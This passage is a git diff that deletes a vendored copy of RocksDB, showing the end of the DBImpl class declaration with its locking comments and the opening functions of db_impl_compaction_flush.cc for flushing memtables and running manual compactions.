-  FileLock* db_lock_;
-
-  // In addition to mutex_, log_write_mutex_ protected writes to logs_ and
-  // logfile_number_. With concurrent_prepare it also protects alive_log_files_,
-  // and log_empty_. Refer to the definition of each variable below for more
-  // details.
-  InstrumentedMutex log_write_mutex_;
-  // State below is protected by mutex_
-  // With concurrent_prepare enabled, some of the variables that accessed during
-  // WriteToWAL need different synchronization: log_empty_, alive_log_files_,
-  // logs_, logfile_number_. Refer to the definition of each variable below for
-  // more description.
-  mutable InstrumentedMutex mutex_;
-
-  std::atomic<bool> shutting_down_;
-  // This condition variable is signaled on these conditions:
-  // * whenever bg_compaction_scheduled_ goes down to 0
-  // * if AnyManualCompaction, whenever a compaction finishes, even if it hasn't
-  // made any progress
-  // * whenever a compaction made any progress
-  // * whenever bg_flush_scheduled_ or bg_purge_scheduled_ value decreases
-  // (i.e. whenever a flush is done, even if it didn't make any progress)
-  // * whenever there is an error in background purge, flush or compaction
-  // * whenever num_running_ingest_file_ goes to 0.
-  InstrumentedCondVar bg_cv_;
-  // Writes are protected by locking both mutex_ and log_write_mutex_, and reads
-  // must be under either mutex_ or log_write_mutex_. Since after ::Open,
-  // logfile_number_ is currently updated only in write_thread_, it can be read
-  // from the same write_thread_ without any locks.
-  uint64_t logfile_number_;
-  std::deque<uint64_t>
-      log_recycle_files;  // a list of log files that we can recycle
-  bool log_dir_synced_;
-  // Without concurrent_prepare, read and writes to log_empty_ are protected by
-  // mutex_. Since it is currently updated/read only in write_thread_, it can be
-  // accessed from the same write_thread_ without any locks. With
-  // concurrent_prepare writes, where it can be updated in different threads,
-  // read and writes are protected by log_write_mutex_ instead. This is to avoid
-  // expesnive mutex_ lock during WAL write, which update log_empty_.
-  bool log_empty_;
-  ColumnFamilyHandleImpl* default_cf_handle_;
-  InternalStats* default_cf_internal_stats_;
-  unique_ptr<ColumnFamilyMemTablesImpl> column_family_memtables_;
-  struct LogFileNumberSize {
-    explicit LogFileNumberSize(uint64_t _number)
-        : number(_number) {}
-    void AddSize(uint64_t new_size) { size += new_size; }
-    uint64_t number;
-    uint64_t size = 0;
-    bool getting_flushed = false;
-  };
-  struct LogWriterNumber {
-    // pass ownership of _writer
-    LogWriterNumber(uint64_t _number, log::Writer* _writer)
-        : number(_number), writer(_writer) {}
-
-    log::Writer* ReleaseWriter() {
-      auto* w = writer;
-      writer = nullptr;
-      return w;
-    }
-    void ClearWriter() {
-      delete writer;
-      writer = nullptr;
-    }
-
-    uint64_t number;
-    // Visual Studio doesn't support deque's member to be noncopyable because
-    // of a unique_ptr as a member.
-    log::Writer* writer;  // own
-    // true for some prefix of logs_
-    bool getting_synced = false;
-  };
-  // Without concurrent_prepare, read and writes to alive_log_files_ are
-  // protected by mutex_. However since back() is never popped, and push_back()
-  // is done only from write_thread_, the same thread can access the item
-  // reffered by back() without mutex_. With concurrent_prepare_, writes
-  // are protected by locking both mutex_ and log_write_mutex_, and reads must
-  // be under either mutex_ or log_write_mutex_.
-  std::deque<LogFileNumberSize> alive_log_files_;
-  // Log files that aren't fully synced, and the current log file.
-  // Synchronization:
-  //  - push_back() is done from write_thread_ with locked mutex_ and
-  //  log_write_mutex_
-  //  - pop_front() is done from any thread with locked mutex_ and
-  //  log_write_mutex_
-  //  - reads are done with either locked mutex_ or log_write_mutex_
-  //  - back() and items with getting_synced=true are not popped,
-  //  - The same thread that sets getting_synced=true will reset it.
-  //  - it follows that the object referred by back() can be safely read from
-  //  the write_thread_ without using mutex
-  //  - it follows that the items with getting_synced=true can be safely read
-  //  from the same thread that has set getting_synced=true
-  std::deque<LogWriterNumber> logs_;
-  // Signaled when getting_synced becomes false for some of the logs_.
-  InstrumentedCondVar log_sync_cv_;
-  std::atomic<uint64_t> total_log_size_;
-  // only used for dynamically adjusting max_total_wal_size. it is a sum of
-  // [write_buffer_size * max_write_buffer_number] over all column families
-  uint64_t max_total_in_memory_state_;
-  // If true, we have only one (default) column family. We use this to optimize
-  // some code-paths
-  bool single_column_family_mode_;
-  // If this is non-empty, we need to delete these log files in background
-  // threads. Protected by db mutex.
-  autovector<log::Writer*> logs_to_free_;
-
-  bool is_snapshot_supported_;
-
-  // Class to maintain directories for all database paths other than main one.
-  class Directories {
-   public:
-    Status SetDirectories(Env* env, const std::string& dbname,
-                          const std::string& wal_dir,
-                          const std::vector<DbPath>& data_paths);
-
-    Directory* GetDataDir(size_t path_id);
-
-    Directory* GetWalDir() {
-      if (wal_dir_) {
-        return wal_dir_.get();
-      }
-      return db_dir_.get();
-    }
-
-    Directory* GetDbDir() { return db_dir_.get(); }
-
-   private:
-    std::unique_ptr<Directory> db_dir_;
-    std::vector<std::unique_ptr<Directory>> data_dirs_;
-    std::unique_ptr<Directory> wal_dir_;
-
-    Status CreateAndNewDirectory(Env* env, const std::string& dirname,
-                                 std::unique_ptr<Directory>* directory) const;
-  };
-
-  Directories directories_;
-
-  WriteBufferManager* write_buffer_manager_;
-
-  WriteThread write_thread_;
-  WriteBatch tmp_batch_;
-  // The write thread when the writers have no memtable write. This will be used
-  // in 2PC to batch the prepares separately from the serial commit.
-  WriteThread nonmem_write_thread_;
-
-  WriteController write_controller_;
-
-  unique_ptr<RateLimiter> low_pri_write_rate_limiter_;
-
-  // Size of the last batch group. In slowdown mode, next write needs to
-  // sleep if it uses up the quota.
-  // Note: This is to protect memtable and compaction. If the batch only writes
-  // to the WAL its size need not to be included in this.
-  uint64_t last_batch_group_size_;
-
-  FlushScheduler flush_scheduler_;
-
-  SnapshotList snapshots_;
-
-  // For each background job, pending_outputs_ keeps the current file number at
-  // the time that background job started.
-  // FindObsoleteFiles()/PurgeObsoleteFiles() never deletes any file that has
-  // number bigger than any of the file number in pending_outputs_. Since file
-  // numbers grow monotonically, this also means that pending_outputs_ is always
-  // sorted. After a background job is done executing, its file number is
-  // deleted from pending_outputs_, which allows PurgeObsoleteFiles() to clean
-  // it up.
-  // State is protected with db mutex.
-  std::list<uint64_t> pending_outputs_;
-
-  // PurgeFileInfo is a structure to hold information of files to be deleted in
-  // purge_queue_
-  struct PurgeFileInfo {
-    std::string fname;
-    FileType type;
-    uint64_t number;
-    uint32_t path_id;
-    int job_id;
-    PurgeFileInfo(std::string fn, FileType t, uint64_t num, uint32_t pid,
-                  int jid)
-        : fname(fn), type(t), number(num), path_id(pid), job_id(jid) {}
-  };
-
-  // flush_queue_ and compaction_queue_ hold column families that we need to
-  // flush and compact, respectively.
-  // A column family is inserted into flush_queue_ when it satisfies condition
-  // cfd->imm()->IsFlushPending()
-  // A column family is inserted into compaction_queue_ when it satisfied
-  // condition cfd->NeedsCompaction()
-  // Column families in this list are all Ref()-erenced
-  // TODO(icanadi) Provide some kind of ReferencedColumnFamily class that will
-  // do RAII on ColumnFamilyData
-  // Column families are in this queue when they need to be flushed or
-  // compacted. Consumers of these queues are flush and compaction threads. When
-  // column family is put on this queue, we increase unscheduled_flushes_ and
-  // unscheduled_compactions_. When these variables are bigger than zero, that
-  // means we need to schedule background threads for compaction and thread.
-  // Once the background threads are scheduled, we decrease unscheduled_flushes_
-  // and unscheduled_compactions_. That way we keep track of number of
-  // compaction and flush threads we need to schedule. This scheduling is done
-  // in MaybeScheduleFlushOrCompaction()
-  // invariant(column family present in flush_queue_ <==>
-  // ColumnFamilyData::pending_flush_ == true)
-  std::deque<ColumnFamilyData*> flush_queue_;
-  // invariant(column family present in compaction_queue_ <==>
-  // ColumnFamilyData::pending_compaction_ == true)
-  std::deque<ColumnFamilyData*> compaction_queue_;
-
-  // A queue to store filenames of the files to be purged
-  std::deque<PurgeFileInfo> purge_queue_;
-
-  // A queue to store log writers to close
-  std::deque<log::Writer*> logs_to_free_queue_;
-  int unscheduled_flushes_;
-  int unscheduled_compactions_;
-
-  // count how many background compactions are running or have been scheduled in
-  // the BOTTOM pool
-  int bg_bottom_compaction_scheduled_;
-
-  // count how many background compactions are running or have been scheduled
-  int bg_compaction_scheduled_;
-
-  // stores the number of compactions are currently running
-  int num_running_compactions_;
-
-  // number of background memtable flush jobs, submitted to the HIGH pool
-  int bg_flush_scheduled_;
-
-  // stores the number of flushes are currently running
-  int num_running_flushes_;
-
-  // number of background obsolete file purge jobs, submitted to the HIGH pool
-  int bg_purge_scheduled_;
-
-  // Information for a manual compaction
-  struct ManualCompactionState {
-    ColumnFamilyData* cfd;
-    int input_level;
-    int output_level;
-    uint32_t output_path_id;
-    Status status;
-    bool done;
-    bool in_progress;             // compaction request being processed?
-    bool incomplete;              // only part of requested range compacted
-    bool exclusive;               // current behavior of only one manual
-    bool disallow_trivial_move;   // Force actual compaction to run
-    const InternalKey* begin;     // nullptr means beginning of key range
-    const InternalKey* end;       // nullptr means end of key range
-    InternalKey* manual_end;      // how far we are compacting
-    InternalKey tmp_storage;      // Used to keep track of compaction progress
-    InternalKey tmp_storage1;     // Used to keep track of compaction progress
-  };
-  struct PrepickedCompaction {
-    // background compaction takes ownership of `compaction`.
-    Compaction* compaction;
-    // caller retains ownership of `manual_compaction_state` as it is reused
-    // across background compactions.
-    ManualCompactionState* manual_compaction_state;  // nullptr if non-manual
-  };
-  std::deque<ManualCompactionState*> manual_compaction_dequeue_;
-
-  struct CompactionArg {
-    // caller retains ownership of `db`.
-    DBImpl* db;
-    // background compaction takes ownership of `prepicked_compaction`.
-    PrepickedCompaction* prepicked_compaction;
-  };
-
-  // Have we encountered a background error in paranoid mode?
-  Status bg_error_;
-
-  // shall we disable deletion of obsolete files
-  // if 0 the deletion is enabled.
-  // if non-zero, files will not be getting deleted
-  // This enables two different threads to call
-  // EnableFileDeletions() and DisableFileDeletions()
-  // without any synchronization
-  int disable_delete_obsolete_files_;
-
-  // last time when DeleteObsoleteFiles with full scan was executed. Originaly
-  // initialized with startup time.
-  uint64_t delete_obsolete_files_last_run_;
-
-  // last time stats were dumped to LOG
-  std::atomic<uint64_t> last_stats_dump_time_microsec_;
-
-  // Each flush or compaction gets its own job id. this counter makes sure
-  // they're unique
-  std::atomic<int> next_job_id_;
-
-  // A flag indicating whether the current rocksdb database has any
-  // data that is not yet persisted into either WAL or SST file.
-  // Used when disableWAL is true.
-  std::atomic<bool> has_unpersisted_data_;
-
-  // if an attempt was made to flush all column families that
-  // the oldest log depends on but uncommited data in the oldest
-  // log prevents the log from being released.
-  // We must attempt to free the dependent memtables again
-  // at a later time after the transaction in the oldest
-  // log is fully commited.
-  bool unable_to_flush_oldest_log_;
-
-  static const int KEEP_LOG_FILE_NUM = 1000;
-  // MSVC version 1800 still does not have constexpr for ::max()
-  static const uint64_t kNoTimeOut = port::kMaxUint64;
-
-  std::string db_absolute_path_;
-
-  // The options to access storage files
-  const EnvOptions env_options_;
-
-  // Number of running IngestExternalFile() calls.
-  // REQUIRES: mutex held
-  int num_running_ingest_file_;
-
-#ifndef ROCKSDB_LITE
-  WalManager wal_manager_;
-#endif  // ROCKSDB_LITE
-
-  // Unified interface for logging events
-  EventLogger event_logger_;
-
-  // A value of > 0 temporarily disables scheduling of background work
-  int bg_work_paused_;
-
-  // A value of > 0 temporarily disables scheduling of background compaction
-  int bg_compaction_paused_;
-
-  // Guard against multiple concurrent refitting
-  bool refitting_level_;
-
-  // Indicate DB was opened successfully
-  bool opened_successfully_;
-
-  // minimum log number still containing prepared data.
-  // this is used by FindObsoleteFiles to determine which
-  // flushed logs we must keep around because they still
-  // contain prepared data which has not been flushed or rolled back
-  std::priority_queue<uint64_t, std::vector<uint64_t>, std::greater<uint64_t>>
-      min_log_with_prep_;
-
-  // to be used in conjunction with min_log_with_prep_.
-  // once a transaction with data in log L is committed or rolled back
-  // rather than removing the value from the heap we add that value
-  // to prepared_section_completed_ which maps LOG -> instance_count
-  // since a log could contain multiple prepared sections
-  //
-  // when trying to determine the minimum log still active we first
-  // consult min_log_with_prep_. while that root value maps to
-  // a value > 0 in prepared_section_completed_ we decrement the
-  // instance_count for that log and pop the root value in
-  // min_log_with_prep_. This will work the same as a min_heap
-  // where we are deleteing arbitrary elements and the up heaping.
-  std::unordered_map<uint64_t, uint64_t> prepared_section_completed_;
-  std::mutex prep_heap_mutex_;
-
-  // No copying allowed
-  DBImpl(const DBImpl&);
-  void operator=(const DBImpl&);
-
-  // Background threads call this function, which is just a wrapper around
-  // the InstallSuperVersion() function. Background threads carry
-  // job_context which can have new_superversion already
-  // allocated.
-  void InstallSuperVersionAndScheduleWorkWrapper(
-      ColumnFamilyData* cfd, JobContext* job_context,
-      const MutableCFOptions& mutable_cf_options);
-
-  // All ColumnFamily state changes go through this function. Here we analyze
-  // the new state and we schedule background work if we detect that the new
-  // state needs flush or compaction.
-  SuperVersion* InstallSuperVersionAndScheduleWork(
-      ColumnFamilyData* cfd, SuperVersion* new_sv,
-      const MutableCFOptions& mutable_cf_options);
-
-#ifndef ROCKSDB_LITE
-  using DB::GetPropertiesOfAllTables;
-  virtual Status GetPropertiesOfAllTables(ColumnFamilyHandle* column_family,
-                                          TablePropertiesCollection* props)
-      override;
-  virtual Status GetPropertiesOfTablesInRange(
-      ColumnFamilyHandle* column_family, const Range* range, std::size_t n,
-      TablePropertiesCollection* props) override;
-
-#endif  // ROCKSDB_LITE
-
-  bool GetIntPropertyInternal(ColumnFamilyData* cfd,
-                              const DBPropertyInfo& property_info,
-                              bool is_locked, uint64_t* value);
-
-  bool HasPendingManualCompaction();
-  bool HasExclusiveManualCompaction();
-  void AddManualCompaction(ManualCompactionState* m);
-  void RemoveManualCompaction(ManualCompactionState* m);
-  bool ShouldntRunManualCompaction(ManualCompactionState* m);
-  bool HaveManualCompaction(ColumnFamilyData* cfd);
-  bool MCOverlap(ManualCompactionState* m, ManualCompactionState* m1);
-
-  size_t GetWalPreallocateBlockSize(uint64_t write_buffer_size) const;
-
-  // When set, we use a seprate queue for writes that dont write to memtable. In
-  // 2PC these are the writes at Prepare phase.
-  const bool concurrent_prepare_;
-  const bool manual_wal_flush_;
-};
-
-extern Options SanitizeOptions(const std::string& db,
-                               const Options& src);
-
-extern DBOptions SanitizeOptions(const std::string& db, const DBOptions& src);
-
-extern CompressionType GetCompressionFlush(
-    const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options);
-
-// Fix user-supplied options to be reasonable
-template <class T, class V>
-static void ClipToRange(T* ptr, V minvalue, V maxvalue) {
-  if (static_cast<V>(*ptr) > maxvalue) *ptr = maxvalue;
-  if (static_cast<V>(*ptr) < minvalue) *ptr = minvalue;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_compaction_flush.cc b/thirdparty/rocksdb/db/db_impl_compaction_flush.cc
deleted file mode 100644
index 3e686fe..0000000
--- a/thirdparty/rocksdb/db/db_impl_compaction_flush.cc
+++ /dev/null
@@ -1,1910 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#include <inttypes.h>
-
-#include "db/builder.h"
-#include "db/event_helpers.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/thread_status_updater.h"
-#include "monitoring/thread_status_util.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-Status DBImpl::SyncClosedLogs(JobContext* job_context) {
-  TEST_SYNC_POINT("DBImpl::SyncClosedLogs:Start");
-  mutex_.AssertHeld();
-  autovector<log::Writer*, 1> logs_to_sync;
-  uint64_t current_log_number = logfile_number_;
-  while (logs_.front().number < current_log_number &&
-         logs_.front().getting_synced) {
-    log_sync_cv_.Wait();
-  }
-  for (auto it = logs_.begin();
-       it != logs_.end() && it->number < current_log_number; ++it) {
-    auto& log = *it;
-    assert(!log.getting_synced);
-    log.getting_synced = true;
-    logs_to_sync.push_back(log.writer);
-  }
-
-  Status s;
-  if (!logs_to_sync.empty()) {
-    mutex_.Unlock();
-
-    for (log::Writer* log : logs_to_sync) {
-      ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                     "[JOB %d] Syncing log #%" PRIu64, job_context->job_id,
-                     log->get_log_number());
-      s = log->file()->Sync(immutable_db_options_.use_fsync);
-    }
-    if (s.ok()) {
-      s = directories_.GetWalDir()->Fsync();
-    }
-
-    mutex_.Lock();
-
-    // "number <= current_log_number - 1" is equivalent to
-    // "number < current_log_number".
-    MarkLogsSynced(current_log_number - 1, true, s);
-    if (!s.ok()) {
-      Status new_bg_error = s;
-      // may temporarily unlock and lock the mutex.
-      EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                            BackgroundErrorReason::kFlush,
-                                            &new_bg_error, &mutex_);
-      if (!new_bg_error.ok()) {
-        bg_error_ = new_bg_error;
-      }
-      TEST_SYNC_POINT("DBImpl::SyncClosedLogs:Failed");
-      return s;
-    }
-  }
-  return s;
-}
-
-Status DBImpl::FlushMemTableToOutputFile(
-    ColumnFamilyData* cfd, const MutableCFOptions& mutable_cf_options,
-    bool* made_progress, JobContext* job_context, LogBuffer* log_buffer) {
-  mutex_.AssertHeld();
-  assert(cfd->imm()->NumNotFlushed() != 0);
-  assert(cfd->imm()->IsFlushPending());
-
-  SequenceNumber earliest_write_conflict_snapshot;
-  std::vector<SequenceNumber> snapshot_seqs =
-      snapshots_.GetAll(&earliest_write_conflict_snapshot);
-
-  FlushJob flush_job(
-      dbname_, cfd, immutable_db_options_, mutable_cf_options, env_options_,
-      versions_.get(), &mutex_, &shutting_down_, snapshot_seqs,
-      earliest_write_conflict_snapshot, job_context, log_buffer,
-      directories_.GetDbDir(), directories_.GetDataDir(0U),
-      GetCompressionFlush(*cfd->ioptions(), mutable_cf_options), stats_,
-      &event_logger_, mutable_cf_options.report_bg_io_stats);
-
-  FileMetaData file_meta;
-
-  flush_job.PickMemTable();
-
-#ifndef ROCKSDB_LITE
-  // may temporarily unlock and lock the mutex.
-  NotifyOnFlushBegin(cfd, &file_meta, mutable_cf_options, job_context->job_id,
-                     flush_job.GetTableProperties());
-#endif  // ROCKSDB_LITE
-
-  Status s;
-  if (logfile_number_ > 0 &&
-      versions_->GetColumnFamilySet()->NumberOfColumnFamilies() > 0) {
-    // If there are more than one column families, we need to make sure that
-    // all the log files except the most recent one are synced. Otherwise if
-    // the host crashes after flushing and before WAL is persistent, the
-    // flushed SST may contain data from write batches whose updates to
-    // other column families are missing.
-    // SyncClosedLogs() may unlock and re-lock the db_mutex.
-    s = SyncClosedLogs(job_context);
-  }
-
-  // Within flush_job.Run, rocksdb may call event listener to notify
-  // file creation and deletion.
-  //
-  // Note that flush_job.Run will unlock and lock the db_mutex,
-  // and EventListener callback will be called when the db_mutex
-  // is unlocked by the current thread.
-  if (s.ok()) {
-    s = flush_job.Run(&file_meta);
-  } else {
-    flush_job.Cancel();
-  }
-
-  if (s.ok()) {
-    InstallSuperVersionAndScheduleWorkWrapper(cfd, job_context,
-                                              mutable_cf_options);
-    if (made_progress) {
-      *made_progress = 1;
-    }
-    VersionStorageInfo::LevelSummaryStorage tmp;
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Level summary: %s\n",
-                     cfd->GetName().c_str(),
-                     cfd->current()->storage_info()->LevelSummary(&tmp));
-  }
-
-  if (!s.ok() && !s.IsShutdownInProgress() &&
-      immutable_db_options_.paranoid_checks && bg_error_.ok()) {
-    Status new_bg_error = s;
-    // may temporarily unlock and lock the mutex.
-    EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                          BackgroundErrorReason::kFlush,
-                                          &new_bg_error, &mutex_);
-    if (!new_bg_error.ok()) {
-      // if a bad error happened (not ShutdownInProgress), paranoid_checks is
-      // true, and the error isn't handled by callback, mark DB read-only
-      bg_error_ = new_bg_error;
-    }
-  }
-  if (s.ok()) {
-#ifndef ROCKSDB_LITE
-    // may temporarily unlock and lock the mutex.
-    NotifyOnFlushCompleted(cfd, &file_meta, mutable_cf_options,
-                           job_context->job_id, flush_job.GetTableProperties());
-    auto sfm = static_cast<SstFileManagerImpl*>(
-        immutable_db_options_.sst_file_manager.get());
-    if (sfm) {
-      // Notify sst_file_manager that a new file was added
-      std::string file_path = MakeTableFileName(
-          immutable_db_options_.db_paths[0].path, file_meta.fd.GetNumber());
-      sfm->OnAddFile(file_path);
-      if (sfm->IsMaxAllowedSpaceReached() && bg_error_.ok()) {
-        Status new_bg_error = Status::IOError("Max allowed space was reached");
-        TEST_SYNC_POINT_CALLBACK(
-            "DBImpl::FlushMemTableToOutputFile:MaxAllowedSpaceReached",
-            &new_bg_error);
-        // may temporarily unlock and lock the mutex.
-        EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                              BackgroundErrorReason::kFlush,
-                                              &new_bg_error, &mutex_);
-        if (!new_bg_error.ok()) {
-          bg_error_ = new_bg_error;
-        }
-      }
-    }
-#endif  // ROCKSDB_LITE
-  }
-  return s;
-}
-
-void DBImpl::NotifyOnFlushBegin(ColumnFamilyData* cfd, FileMetaData* file_meta,
-                                const MutableCFOptions& mutable_cf_options,
-                                int job_id, TableProperties prop) {
-#ifndef ROCKSDB_LITE
-  if (immutable_db_options_.listeners.size() == 0U) {
-    return;
-  }
-  mutex_.AssertHeld();
-  if (shutting_down_.load(std::memory_order_acquire)) {
-    return;
-  }
-  bool triggered_writes_slowdown =
-      (cfd->current()->storage_info()->NumLevelFiles(0) >=
-       mutable_cf_options.level0_slowdown_writes_trigger);
-  bool triggered_writes_stop =
-      (cfd->current()->storage_info()->NumLevelFiles(0) >=
-       mutable_cf_options.level0_stop_writes_trigger);
-  // release lock while notifying events
-  mutex_.Unlock();
-  {
-    FlushJobInfo info;
-    info.cf_name = cfd->GetName();
-    // TODO(yhchiang): make db_paths dynamic in case flush does not
-    //                 go to L0 in the future.
-    info.file_path = MakeTableFileName(immutable_db_options_.db_paths[0].path,
-                                       file_meta->fd.GetNumber());
-    info.thread_id = env_->GetThreadID();
-    info.job_id = job_id;
-    info.triggered_writes_slowdown = triggered_writes_slowdown;
-    info.triggered_writes_stop = triggered_writes_stop;
-    info.smallest_seqno = file_meta->smallest_seqno;
-    info.largest_seqno = file_meta->largest_seqno;
-    info.table_properties = prop;
-    for (auto listener : immutable_db_options_.listeners) {
-      listener->OnFlushBegin(this, info);
-    }
-  }
-  mutex_.Lock();
-// no need to signal bg_cv_ as it will be signaled at the end of the
-// flush process.
-#endif  // ROCKSDB_LITE
-}
-
-void DBImpl::NotifyOnFlushCompleted(ColumnFamilyData* cfd,
-                                    FileMetaData* file_meta,
-                                    const MutableCFOptions& mutable_cf_options,
-                                    int job_id, TableProperties prop) {
-#ifndef ROCKSDB_LITE
-  if (immutable_db_options_.listeners.size() == 0U) {
-    return;
-  }
-  mutex_.AssertHeld();
-  if (shutting_down_.load(std::memory_order_acquire)) {
-    return;
-  }
-  bool triggered_writes_slowdown =
-      (cfd->current()->storage_info()->NumLevelFiles(0) >=
-       mutable_cf_options.level0_slowdown_writes_trigger);
-  bool triggered_writes_stop =
-      (cfd->current()->storage_info()->NumLevelFiles(0) >=
-       mutable_cf_options.level0_stop_writes_trigger);
-  // release lock while notifying events
-  mutex_.Unlock();
-  {
-    FlushJobInfo info;
-    info.cf_name = cfd->GetName();
-    // TODO(yhchiang): make db_paths dynamic in case flush does not
-    //                 go to L0 in the future.
-    info.file_path = MakeTableFileName(immutable_db_options_.db_paths[0].path,
-                                       file_meta->fd.GetNumber());
-    info.thread_id = env_->GetThreadID();
-    info.job_id = job_id;
-    info.triggered_writes_slowdown = triggered_writes_slowdown;
-    info.triggered_writes_stop = triggered_writes_stop;
-    info.smallest_seqno = file_meta->smallest_seqno;
-    info.largest_seqno = file_meta->largest_seqno;
-    info.table_properties = prop;
-    for (auto listener : immutable_db_options_.listeners) {
-      listener->OnFlushCompleted(this, info);
-    }
-  }
-  mutex_.Lock();
-  // no need to signal bg_cv_ as it will be signaled at the end of the
-  // flush process.
-#endif  // ROCKSDB_LITE
-}
-
-Status DBImpl::CompactRange(const CompactRangeOptions& options,
-                            ColumnFamilyHandle* column_family,
-                            const Slice* begin, const Slice* end) {
-  if (options.target_path_id >= immutable_db_options_.db_paths.size()) {
-    return Status::InvalidArgument("Invalid target path ID");
-  }
-
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  bool exclusive = options.exclusive_manual_compaction;
-
-  Status s = FlushMemTable(cfd, FlushOptions());
-  if (!s.ok()) {
-    LogFlush(immutable_db_options_.info_log);
-    return s;
-  }
-
-  int max_level_with_files = 0;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    Version* base = cfd->current();
-    for (int level = 1; level < base->storage_info()->num_non_empty_levels();
-         level++) {
-      if (base->storage_info()->OverlapInLevel(level, begin, end)) {
-        max_level_with_files = level;
-      }
-    }
-  }
-
-  int final_output_level = 0;
-  if (cfd->ioptions()->compaction_style == kCompactionStyleUniversal &&
-      cfd->NumberLevels() > 1) {
-    // Always compact all files together.
-    final_output_level = cfd->NumberLevels() - 1;
-    // if bottom most level is reserved
-    if (immutable_db_options_.allow_ingest_behind) {
-      final_output_level--;
-    }
-    s = RunManualCompaction(cfd, ColumnFamilyData::kCompactAllLevels,
-                            final_output_level, options.target_path_id,
-                            begin, end, exclusive);
-  } else {
-    for (int level = 0; level <= max_level_with_files; level++) {
-      int output_level;
-      // in case the compaction is universal or if we're compacting the
-      // bottom-most level, the output level will be the same as input one.
-      // level 0 can never be the bottommost level (i.e. if all files are in
-      // level 0, we will compact to level 1)
-      if (cfd->ioptions()->compaction_style == kCompactionStyleUniversal ||
-          cfd->ioptions()->compaction_style == kCompactionStyleFIFO) {
-        output_level = level;
-      } else if (level == max_level_with_files && level > 0) {
-        if (options.bottommost_level_compaction ==
-            BottommostLevelCompaction::kSkip) {
-          // Skip bottommost level compaction
-          continue;
-        } else if (options.bottommost_level_compaction ==
-                       BottommostLevelCompaction::kIfHaveCompactionFilter &&
-                   cfd->ioptions()->compaction_filter == nullptr &&
-                   cfd->ioptions()->compaction_filter_factory == nullptr) {
-          // Skip bottommost level compaction since we don't have a compaction
-          // filter
-          continue;
-        }
-        output_level = level;
-      } else {
-        output_level = level + 1;
-        if (cfd->ioptions()->compaction_style == kCompactionStyleLevel &&
-            cfd->ioptions()->level_compaction_dynamic_level_bytes &&
-            level == 0) {
-          output_level = ColumnFamilyData::kCompactToBaseLevel;
-        }
-      }
-      s = RunManualCompaction(cfd, level, output_level, options.target_path_id,
-                              begin, end, exclusive);
-      if (!s.ok()) {
-        break;
-      }
-      if (output_level == ColumnFamilyData::kCompactToBaseLevel) {
-        final_output_level = cfd->NumberLevels() - 1;
-      } else if (output_level > final_output_level) {
-        final_output_level = output_level;
-      }
-      TEST_SYNC_POINT("DBImpl::RunManualCompaction()::1");
-      TEST_SYNC_POINT("DBImpl::RunManualCompaction()::2");
-    }
-  }
-  if (!s.ok()) {
-    LogFlush(immutable_db_options_.info_log);
-    return s;
-  }
-
-  if (options.change_level) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "[RefitLevel] waiting for background threads to stop");
-    s = PauseBackgroundWork();
-    if (s.ok()) {
-      s = ReFitLevel(cfd, final_output_level, options.target_level);
-    }
-    ContinueBackgroundWork();
-  }
-  LogFlush(immutable_db_options_.info_log);
-
-  {
-    InstrumentedMutexLock l(&mutex_);
-    // an automatic compaction that has been scheduled might have been
-    // preempted by the manual compactions. Need to schedule it back.
-    MaybeScheduleFlushOrCompaction();
-  }
-
-  return s;
-}
-
-Status DBImpl::CompactFiles(
-    const CompactionOptions& compact_options,
-    ColumnFamilyHandle* column_family,
-    const std::vector<std::string>& input_file_names,
-    const int output_level, const int output_path_id) {
-#ifdef ROCKSDB_LITE
-    // not supported in lite version
-  return Status::NotSupported("Not supported in ROCKSDB LITE");
-#else
-  if (column_family == nullptr) {
-    return Status::InvalidArgument("ColumnFamilyHandle must be non-null.");
-  }
-
-  auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  assert(cfd);
-
-  Status s;
-  JobContext job_context(0, true);
-  LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL,
-                       immutable_db_options_.info_log.get());
-
-  // Perform CompactFiles
-  SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_);
-  {
-    InstrumentedMutexLock l(&mutex_);
-
-    // This call will unlock/lock the mutex to wait for current running
-    // IngestExternalFile() calls to finish.
-    WaitForIngestFile();
-
-    s = CompactFilesImpl(compact_options, cfd, sv->current,
-                         input_file_names, output_level,
-                         output_path_id, &job_context, &log_buffer);
-  }
-  if (sv->Unref()) {
-    mutex_.Lock();
-    sv->Cleanup();
-    mutex_.Unlock();
-    delete sv;
-  }
-
-  // Find and delete obsolete files
-  {
-    InstrumentedMutexLock l(&mutex_);
-    // If !s.ok(), this means that Compaction failed. In that case, we want
-    // to delete all obsolete files we might have created and we force
-    // FindObsoleteFiles(). This is because job_context does not
-    // catch all created files if compaction failed.
-    FindObsoleteFiles(&job_context, !s.ok());
-  }  // release the mutex
-
-  // delete unnecessary files if any, this is done outside the mutex
-  if (job_context.HaveSomethingToDelete() || !log_buffer.IsEmpty()) {
-    // Have to flush the info logs before bg_compaction_scheduled_--
-    // because if bg_flush_scheduled_ becomes 0 and the lock is
-    // released, the deconstructor of DB can kick in and destroy all the
-    // states of DB so info_log might not be available after that point.
-    // It also applies to access other states that DB owns.
-    log_buffer.FlushBufferToLog();
